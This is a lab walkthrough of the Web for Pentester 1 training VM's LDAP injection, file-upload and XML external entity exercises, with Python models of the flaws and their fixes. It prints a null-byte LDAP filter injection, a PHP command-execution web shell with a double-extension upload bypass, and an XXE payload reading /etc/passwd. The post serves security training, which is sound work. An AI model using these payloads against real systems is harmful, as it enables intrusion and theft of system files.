Web for Pentester 1: LDAP, file upload and XML attacks.

In this post I'll be walking through the Web for Pentester 1 LDAP, file upload and XML attacks. These are the last of the exercises for the virtual machine and will conclude this series.

First off, what is LDAP? LDAP (Lightweight Directory Access Protocol) is a protocol for querying and modifying a directory service (users, groups, machines and their attributes) over a network. It lets an application or user read and update directory entries remotely, as if they were on the directory server itself. For a web application the two things that matter are the bind (the directory's authentication step) and the search filter the application builds from user input; both exercises below abuse one of them.

LDAP answers:
Example 1:
For the first example, just remove everything in the URL from php? onwards, so that no name or password is sent at all, and this should result in you being authenticated. The application binds to the directory with whatever credentials it was given; with both values empty this becomes an anonymous (null) bind, which the directory accepts, and the application treats any successful bind as a successful login.

Example 2:
For example 2 the name and password parameters are placed into an LDAP search filter. You need to close the cn term, add a term that always matches, and then cut off the rest of the filter so the password is never checked.

The URL you end up with should look something like this:
example2.php?name=hacker)(cn=*))%00&password=fake

%00 is a URL-encoded null byte. It does not "comment out" the rest of the filter: PHP hands the filter to the C LDAP client library as a NUL-terminated string, so everything after the null byte, including the password check, is dropped before the query reaches the directory. The application-side fix is to escape every user-supplied value with ldap_escape() (or an equivalent RFC 4515 escaper) before building the filter, which turns the parentheses, the asterisk and the null byte into the harmless sequences \28, \29, \2a and \00.
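The injection above, worked through in Python as an added example (this is not the VM's PHP, which the post does not quote). The filter shape `(&(cn=...)(userPassword=...))` is an assumption about what example 2 builds, the directory entry is constructed test data, and the tiny filter evaluator only understands the AND/OR/equality subset needed here:

```python
import re

# Constructed directory contents for the demo (not from the page): one entry.
DIRECTORY = [{"cn": "hacker", "userPassword": "s3cret"}]


def build_filter_vulnerable(name, password):
    """Assumed shape of the filter the vulnerable page builds: plain string
    concatenation of both parameters into an AND filter."""
    return f"(&(cn={name})(userPassword={password}))"


def as_seen_by_ldap_library(filter_str):
    """PHP passes the filter to the C LDAP client as a NUL-terminated string,
    so everything from the first null byte onwards is silently dropped."""
    return filter_str.split("\x00", 1)[0]


def ldap_escape(value):
    """RFC 4515 escaping for a value placed inside a filter assertion."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def ldap_unescape(value):
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def build_filter_safe(name, password):
    """Hardened version: every user-controlled value is escaped first."""
    return f"(&(cn={ldap_escape(name)})(userPassword={ldap_escape(password)}))"


def parens_balanced(filter_str):
    """Quick structural check; the raw injected filter fails it."""
    depth = 0
    for c in filter_str:
        depth += (c == "(") - (c == ")")
        if depth < 0:
            return False
    return depth == 0


# Minimal evaluator for the subset of filter syntax used here:
# (&...), (|...) and (attr=value), where the value "*" is a presence test.
def _parse(s, i):
    if s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if s[i] in "&|":
        op, i, kids = s[i], i + 1, []
        while s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        if s[i] != ")":
            raise ValueError("unterminated filter list")
        return (op, kids), i + 1
    j = s.index(")", i)
    attr, val = s[i:j].split("=", 1)
    return ("=", attr, ldap_unescape(val)), j + 1


def _eval(node, entry):
    if node[0] == "&":
        return all(_eval(k, entry) for k in node[1])
    if node[0] == "|":
        return any(_eval(k, entry) for k in node[1])
    _, attr, val = node
    return attr in entry if val == "*" else entry.get(attr) == val


def search(filter_str, directory=DIRECTORY):
    """Return the entries the filter matches; rejects filters with trailing text."""
    node, end = _parse(filter_str, 0)
    if end != len(filter_str):
        raise ValueError("trailing data after filter: %r" % filter_str[end:])
    return [e for e in directory if _eval(node, e)]


if __name__ == "__main__":
    injected = build_filter_vulnerable("hacker)(cn=*))\x00", "fake")
    print(repr(injected), "balanced:", parens_balanced(injected))
    seen = as_seen_by_ldap_library(injected)
    print(seen, "->", search(seen))
    safe = build_filter_safe("hacker)(cn=*))\x00", "fake")
    print(safe, "->", search(safe))
```

Running it shows the three states of the filter: the raw concatenation is unbalanced (and a strict server would reject it), the string the C library actually receives is `(&(cn=hacker)(cn=*))`, which matches the hacker entry whatever the password, and the escaped filter matches nothing because the whole injection is now one literal cn value.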

File Upload:

The code we will use in the file that will be uploaded is the following:
<?php
    // Runs whatever is passed in the cmd query parameter as a shell command
    // and echoes its output; this is the file we upload in both examples.
    system($_GET["cmd"]);
?>

Copy that into a file with a .php extension.
Example 1:
Upload the PHP file, then follow the link the VM gives you to the uploaded file.
Once on that page you should get a PHP warning saying the system cannot execute a blank command. That warning is the confirmation you want: the file was executed rather than served back as text, and system() was called with an empty cmd parameter.
All you now have to do is append ?cmd=cat /etc/passwd (the browser encodes the space as %20) to output the passwd file contents on the page.
Example 2:
This time the upload filter rejects files whose name ends in .php. Create a new file with the code above and the extension .php.blah (e.g. shell.php.blah); you can swap blah for anything else, just make sure it is not an extension the server has a handler for. Apache's mod_mime examines every extension in a file name and applies the handler of any it recognises, so shell.php.blah still goes to the PHP handler, while the filter, which only looks at the final extension, lets it through. (On servers where PHP is mapped with a FilesMatch anchored at the end of the name, as current Debian and Ubuntu packages do, this trick does not work; it needs the AddHandler/AddType style of configuration.)
Upload the file, click the link and you should get the same error you got in example 1. Now append ?cmd=cat /etc/passwd to the URL and you should get the passwd file displayed.
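To make the example 2 bypass concrete, here is an added Python model of the two checks that disagree (not the VM's upload code, which the post does not show). The deny list and the `.php` handler mapping are assumptions about the VM's configuration; the hardened `accept_upload` policy is the one I would put in place instead:

```python
import os
import re

# Assumed deny list of the example 2 filter; the page only says .php is refused.
DENIED = {".php", ".php3", ".php4", ".php5", ".phtml"}

# Assumed server configuration, "AddHandler ... .php" style (not quoted on the page).
HANDLERS = {".php": "application/x-httpd-php"}


def blocked_by_last_extension(filename):
    """The naive check: only the final extension is compared to the deny list."""
    return os.path.splitext(filename)[1].lower() in DENIED


def apache_mod_mime_handler(filename, handlers=HANDLERS):
    """Model of mod_mime's multiple-extension rule: every dot-separated extension
    is examined, unknown ones are ignored, and the rightmost mapped one wins."""
    handler = None
    for ext in filename.lower().split(".")[1:]:
        handler = handlers.get("." + ext, handler)
    return handler


def executes_despite_filter(filename):
    """True when the deny list lets the name through but PHP would still run it."""
    return not blocked_by_last_extension(filename) and apache_mod_mime_handler(filename) is not None


# Hardened policy: an allow list applied to the whole name (exactly one extension),
# plus a server-generated file name so the client never chooses what is stored.
_SAFE_NAME = re.compile(r"[a-z0-9_-]{1,64}\.(png|jpe?g|gif)")


def accept_upload(filename):
    """Return the name to store the file under, or None to reject the upload."""
    name = filename.lower()
    if not _SAFE_NAME.fullmatch(name):
        return None
    return os.urandom(8).hex() + "." + name.rsplit(".", 1)[1]


if __name__ == "__main__":
    for f in ("shell.php", "shell.php.blah", "shell.phtml", "cat.png"):
        print(f, "blocked:", blocked_by_last_extension(f),
              "handler:", apache_mod_mime_handler(f),
              "stored as:", accept_upload(f))
```

The point of `accept_upload` is that it never asks "is this extension bad?"; it asks "is this whole name one I would serve?", and then discards the client's name anyway. Storing uploads outside the web root, or in a directory with `php_flag engine off` / no handlers, is the belt-and-braces step that makes the question of execution moot.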
XML attacks:
Example 1:
Here all you have to do is paste the payload provided by PentesterLab into the URL, followed by a URL-encoded null byte (%00), and the exploit should work:
<%21DOCTYPE%20test%20%5b<%21ENTITY%20hacker%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%5d><test>%26hacker%3b<%2ftest>%0a%0a
URL-decoded, that is:
<!DOCTYPE test [<!ENTITY hacker SYSTEM "file:///etc/passwd">]><test>&hacker;</test>
This is an XML external entity (XXE) attack: the DOCTYPE declares an entity called hacker whose content is the file /etc/passwd, and when the parser expands &hacker; inside <test> the file contents become the element's text, which the page then echoes back to you.
Example 2: 
If you follow the PentesterLab walkthrough for this example, the exploit should work and give you the password pentesterlab.